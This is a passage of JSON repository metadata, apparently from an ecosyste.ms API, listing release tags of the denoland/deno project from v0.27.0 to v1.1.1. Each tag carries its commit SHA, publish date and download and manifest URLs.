https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/